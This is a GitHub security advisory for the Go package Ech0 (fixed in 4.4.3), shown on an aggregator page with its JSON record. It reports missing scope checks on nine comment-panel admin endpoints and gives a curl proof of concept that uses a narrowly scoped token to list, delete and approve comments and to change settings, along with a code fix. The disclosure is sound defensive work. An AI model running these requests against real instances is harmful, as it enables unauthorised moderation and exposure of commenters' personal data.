GHSA-FWG7-53P4-G33C

Vulnerability from github – Published: 2026-04-10 19:49 – Updated: 2026-04-10 19:49
VLAI
Summary
Ech0 Comment Panel Endpoints Missing RequireScopes Middleware — Scoped Access Token Bypass
Details

Summary

All 9 comment panel admin endpoints (/api/panel/comments/*) are missing RequireScopes() middleware, while every other admin endpoint in the application enforces scope-based authorization on access tokens. An admin-issued access token scoped to minimal permissions (e.g., echo:read only) can perform full comment moderation operations including listing, approving, rejecting, deleting comments, and modifying comment system settings.

Details

The access token scope enforcement system works as follows: JWTAuthMiddleware (internal/middleware/auth.go) parses any valid JWT and injects a viewer into the request context. The RequireScopes() middleware (internal/middleware/scope.go:14) then checks whether the token is an access token and, if so, validates that it carries the required scopes. Session tokens are passed through without scope checks (by design — sessions represent full user authority).

Every admin route group applies RequireScopes() per-handler:

  • internal/router/echo.go — uses RequireScopes(ScopeEchoWrite) / RequireScopes(ScopeEchoRead)
  • internal/router/file.go — uses RequireScopes(ScopeFileRead) / RequireScopes(ScopeFileWrite)
  • internal/router/user.go — uses RequireScopes(ScopeAdminUser) / RequireScopes(ScopeProfileRead)
  • internal/router/setting.go — uses RequireScopes(ScopeAdminSettings) / RequireScopes(ScopeAdminToken)

However, internal/router/comment.go:28-36 registers all 9 panel endpoints directly on AuthRouterGroup without any RequireScopes() call:

// internal/router/comment.go:28-36
appRouterGroup.AuthRouterGroup.GET("/panel/comments", h.CommentHandler.ListPanelComments())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id", h.CommentHandler.GetCommentByID())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status", h.CommentHandler.UpdateCommentStatus())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot", h.CommentHandler.UpdateCommentHot())
appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id", h.CommentHandler.DeleteComment())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch", h.CommentHandler.BatchAction())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings", h.CommentHandler.GetCommentSetting())
appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings", h.CommentHandler.UpdateCommentSetting())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email", h.CommentHandler.TestCommentEmail())

The service layer's requireAdmin() (internal/service/comment/comment.go:719-732) only validates the user's database role (IsAdmin/IsOwner), not the token's scopes:

func (s *CommentService) requireAdmin(ctx context.Context) error {
    v := viewer.MustFromContext(ctx)
    if v == nil || strings.TrimSpace(v.UserID()) == "" {
        return commonModel.NewBizError(...)
    }
    user, err := s.commonService.CommonGetUserByUserId(ctx, v.UserID())
    if err != nil { return err }
    if !user.IsAdmin && !user.IsOwner {
        return commonModel.NewBizError(...)
    }
    return nil
}

The scopes comment:read, comment:write, and comment:moderate are defined in internal/model/auth/scope.go:11-13 and registered as valid scopes, but are never referenced in any RequireScopes() middleware call anywhere in the codebase.

Execution flow: Request with access token (scoped to echo:read only) → JWTAuthMiddleware extracts user ID, sets viewer → No RequireScopes middleware → Handler calls service → requireAdmin() checks user.IsAdmin (true for admin user) → Operation succeeds.

PoC

# 1. As admin, create an access token scoped ONLY to echo:read
curl -X POST https://target/api/settings/access-tokens \
  -H 'Authorization: Bearer <admin-session-token>' \
  -H 'Content-Type: application/json' \
  -d '{"name":"readonly","scopes":["echo:read"],"audience":["public-client"],"expiry_days":30}'
# Save the returned token as $TOKEN

# 2. Verify the token CANNOT access other admin endpoints (scoped correctly):
curl https://target/api/settings \
  -H "Authorization: Bearer $TOKEN"
# Expected: 403 Forbidden (scope check blocks access)

# 3. Use the same limited token to list ALL comments (including pending/rejected):
curl https://target/api/panel/comments \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK with full comment list (bypasses scope enforcement)

# 4. Delete a comment:
curl -X DELETE https://target/api/panel/comments/<comment-id> \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (should require comment:moderate scope)

# 5. Approve/reject comments:
curl -X PATCH https://target/api/panel/comments/<comment-id>/status \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"status":"approved"}'
# Expected: 200 OK (should require comment:moderate scope)

# 6. Read comment system settings:
curl https://target/api/panel/comments/settings \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (may expose SMTP configuration)

# 7. Disable the comment system entirely:
curl -X PUT https://target/api/panel/comments/settings \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"enable_comment":false}'
# Expected: 200 OK (should require admin:settings scope)

Impact

  • Principle of least privilege violation: Access tokens designed to limit admin capabilities do not restrict comment panel access. An integration token intended only for reading echoes gains full comment moderation authority.
  • Unauthorized comment moderation: An attacker who compromises a limited-scope access token (e.g., a CI/CD token scoped to echo:read) can approve, reject, delete, and batch-modify all comments.
  • Data exposure: The panel comment listing endpoint returns commenter PII (email addresses, IP hashes, user agents) that should be restricted to tokens with comment:read scope.
  • Settings modification: Comment system settings (including potentially SMTP configuration) can be read and modified, and test emails can be triggered, which could leak mail server credentials.
  • Scope: The attack requires an admin-issued access token, which limits the attack surface (PR:H). However, access tokens are specifically designed for limited-privilege integrations, and this vulnerability negates those limits for the entire comment subsystem.

Recommended Fix

Add RequireScopes() middleware to all comment panel routes in internal/router/comment.go:

func setupCommentRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
    // ... captcha and public routes unchanged ...

    // Admin Panel — enforce scopes on access tokens
    appRouterGroup.AuthRouterGroup.GET("/panel/comments",
        middleware.RequireScopes(authModel.ScopeCommentRead),
        h.CommentHandler.ListPanelComments())
    appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id",
        middleware.RequireScopes(authModel.ScopeCommentRead),
        h.CommentHandler.GetCommentByID())
    appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status",
        middleware.RequireScopes(authModel.ScopeCommentMod),
        h.CommentHandler.UpdateCommentStatus())
    appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot",
        middleware.RequireScopes(authModel.ScopeCommentMod),
        h.CommentHandler.UpdateCommentHot())
    appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id",
        middleware.RequireScopes(authModel.ScopeCommentMod),
        h.CommentHandler.DeleteComment())
    appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch",
        middleware.RequireScopes(authModel.ScopeCommentMod),
        h.CommentHandler.BatchAction())
    appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings",
        middleware.RequireScopes(authModel.ScopeAdminSettings),
        h.CommentHandler.GetCommentSetting())
    appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings",
        middleware.RequireScopes(authModel.ScopeAdminSettings),
        h.CommentHandler.UpdateCommentSetting())
    appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email",
        middleware.RequireScopes(authModel.ScopeAdminSettings),
        h.CommentHandler.TestCommentEmail())
}
Severity
5.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lin-snow/ech0"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:49:20Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nAll 9 comment panel admin endpoints (`/api/panel/comments/*`) are missing `RequireScopes()` middleware, while every other admin endpoint in the application enforces scope-based authorization on access tokens. An admin-issued access token scoped to minimal permissions (e.g., `echo:read` only) can perform full comment moderation operations including listing, approving, rejecting, deleting comments, and modifying comment system settings.\n\n## Details\n\nThe access token scope enforcement system works as follows: `JWTAuthMiddleware` (`internal/middleware/auth.go`) parses any valid JWT and injects a viewer into the request context. The `RequireScopes()` middleware (`internal/middleware/scope.go:14`) then checks whether the token is an access token and, if so, validates that it carries the required scopes. Session tokens are passed through without scope checks (by design \u2014 sessions represent full user authority).\n\nEvery admin route group applies `RequireScopes()` per-handler:\n\n- `internal/router/echo.go` \u2014 uses `RequireScopes(ScopeEchoWrite)` / `RequireScopes(ScopeEchoRead)`\n- `internal/router/file.go` \u2014 uses `RequireScopes(ScopeFileRead)` / `RequireScopes(ScopeFileWrite)`\n- `internal/router/user.go` \u2014 uses `RequireScopes(ScopeAdminUser)` / `RequireScopes(ScopeProfileRead)`\n- `internal/router/setting.go` \u2014 uses `RequireScopes(ScopeAdminSettings)` / `RequireScopes(ScopeAdminToken)`\n\nHowever, `internal/router/comment.go:28-36` registers all 9 panel endpoints directly on `AuthRouterGroup` without any `RequireScopes()` call:\n\n```go\n// internal/router/comment.go:28-36\nappRouterGroup.AuthRouterGroup.GET(\"/panel/comments\", h.CommentHandler.ListPanelComments())\nappRouterGroup.AuthRouterGroup.GET(\"/panel/comments/:id\", h.CommentHandler.GetCommentByID())\nappRouterGroup.AuthRouterGroup.PATCH(\"/panel/comments/:id/status\", h.CommentHandler.UpdateCommentStatus())\nappRouterGroup.AuthRouterGroup.PATCH(\"/panel/comments/:id/hot\", h.CommentHandler.UpdateCommentHot())\nappRouterGroup.AuthRouterGroup.DELETE(\"/panel/comments/:id\", h.CommentHandler.DeleteComment())\nappRouterGroup.AuthRouterGroup.POST(\"/panel/comments/batch\", h.CommentHandler.BatchAction())\nappRouterGroup.AuthRouterGroup.GET(\"/panel/comments/settings\", h.CommentHandler.GetCommentSetting())\nappRouterGroup.AuthRouterGroup.PUT(\"/panel/comments/settings\", h.CommentHandler.UpdateCommentSetting())\nappRouterGroup.AuthRouterGroup.POST(\"/panel/comments/settings/test-email\", h.CommentHandler.TestCommentEmail())\n```\n\nThe service layer\u0027s `requireAdmin()` (`internal/service/comment/comment.go:719-732`) only validates the user\u0027s database role (`IsAdmin`/`IsOwner`), not the token\u0027s scopes:\n\n```go\nfunc (s *CommentService) requireAdmin(ctx context.Context) error {\n    v := viewer.MustFromContext(ctx)\n    if v == nil || strings.TrimSpace(v.UserID()) == \"\" {\n        return commonModel.NewBizError(...)\n    }\n    user, err := s.commonService.CommonGetUserByUserId(ctx, v.UserID())\n    if err != nil { return err }\n    if !user.IsAdmin \u0026\u0026 !user.IsOwner {\n        return commonModel.NewBizError(...)\n    }\n    return nil\n}\n```\n\nThe scopes `comment:read`, `comment:write`, and `comment:moderate` are defined in `internal/model/auth/scope.go:11-13` and registered as valid scopes, but are never referenced in any `RequireScopes()` middleware call anywhere in the codebase.\n\n**Execution flow:** Request with access token (scoped to `echo:read` only) \u2192 `JWTAuthMiddleware` extracts user ID, sets viewer \u2192 No `RequireScopes` middleware \u2192 Handler calls service \u2192 `requireAdmin()` checks `user.IsAdmin` (true for admin user) \u2192 Operation succeeds.\n\n## PoC\n\n```bash\n# 1. As admin, create an access token scoped ONLY to echo:read\ncurl -X POST https://target/api/settings/access-tokens \\\n  -H \u0027Authorization: Bearer \u003cadmin-session-token\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"name\":\"readonly\",\"scopes\":[\"echo:read\"],\"audience\":[\"public-client\"],\"expiry_days\":30}\u0027\n# Save the returned token as $TOKEN\n\n# 2. Verify the token CANNOT access other admin endpoints (scoped correctly):\ncurl https://target/api/settings \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Expected: 403 Forbidden (scope check blocks access)\n\n# 3. Use the same limited token to list ALL comments (including pending/rejected):\ncurl https://target/api/panel/comments \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Expected: 200 OK with full comment list (bypasses scope enforcement)\n\n# 4. Delete a comment:\ncurl -X DELETE https://target/api/panel/comments/\u003ccomment-id\u003e \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Expected: 200 OK (should require comment:moderate scope)\n\n# 5. Approve/reject comments:\ncurl -X PATCH https://target/api/panel/comments/\u003ccomment-id\u003e/status \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"status\":\"approved\"}\u0027\n# Expected: 200 OK (should require comment:moderate scope)\n\n# 6. Read comment system settings:\ncurl https://target/api/panel/comments/settings \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Expected: 200 OK (may expose SMTP configuration)\n\n# 7. Disable the comment system entirely:\ncurl -X PUT https://target/api/panel/comments/settings \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"enable_comment\":false}\u0027\n# Expected: 200 OK (should require admin:settings scope)\n```\n\n## Impact\n\n- **Principle of least privilege violation**: Access tokens designed to limit admin capabilities do not restrict comment panel access. An integration token intended only for reading echoes gains full comment moderation authority.\n- **Unauthorized comment moderation**: An attacker who compromises a limited-scope access token (e.g., a CI/CD token scoped to `echo:read`) can approve, reject, delete, and batch-modify all comments.\n- **Data exposure**: The panel comment listing endpoint returns commenter PII (email addresses, IP hashes, user agents) that should be restricted to tokens with `comment:read` scope.\n- **Settings modification**: Comment system settings (including potentially SMTP configuration) can be read and modified, and test emails can be triggered, which could leak mail server credentials.\n- **Scope**: The attack requires an admin-issued access token, which limits the attack surface (PR:H). However, access tokens are specifically designed for limited-privilege integrations, and this vulnerability negates those limits for the entire comment subsystem.\n\n## Recommended Fix\n\nAdd `RequireScopes()` middleware to all comment panel routes in `internal/router/comment.go`:\n\n```go\nfunc setupCommentRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {\n\t// ... captcha and public routes unchanged ...\n\n\t// Admin Panel \u2014 enforce scopes on access tokens\n\tappRouterGroup.AuthRouterGroup.GET(\"/panel/comments\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentRead),\n\t\th.CommentHandler.ListPanelComments())\n\tappRouterGroup.AuthRouterGroup.GET(\"/panel/comments/:id\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentRead),\n\t\th.CommentHandler.GetCommentByID())\n\tappRouterGroup.AuthRouterGroup.PATCH(\"/panel/comments/:id/status\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentMod),\n\t\th.CommentHandler.UpdateCommentStatus())\n\tappRouterGroup.AuthRouterGroup.PATCH(\"/panel/comments/:id/hot\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentMod),\n\t\th.CommentHandler.UpdateCommentHot())\n\tappRouterGroup.AuthRouterGroup.DELETE(\"/panel/comments/:id\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentMod),\n\t\th.CommentHandler.DeleteComment())\n\tappRouterGroup.AuthRouterGroup.POST(\"/panel/comments/batch\",\n\t\tmiddleware.RequireScopes(authModel.ScopeCommentMod),\n\t\th.CommentHandler.BatchAction())\n\tappRouterGroup.AuthRouterGroup.GET(\"/panel/comments/settings\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.CommentHandler.GetCommentSetting())\n\tappRouterGroup.AuthRouterGroup.PUT(\"/panel/comments/settings\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.CommentHandler.UpdateCommentSetting())\n\tappRouterGroup.AuthRouterGroup.POST(\"/panel/comments/settings/test-email\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.CommentHandler.TestCommentEmail())\n}\n```",
  "id": "GHSA-fwg7-53p4-g33c",
  "modified": "2026-04-10T19:49:20Z",
  "published": "2026-04-10T19:49:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-fwg7-53p4-g33c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lin-snow/Ech0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/releases/tag/v4.4.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ech0 Comment Panel Endpoints Missing RequireScopes Middleware \u2014 Scoped Access Token Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.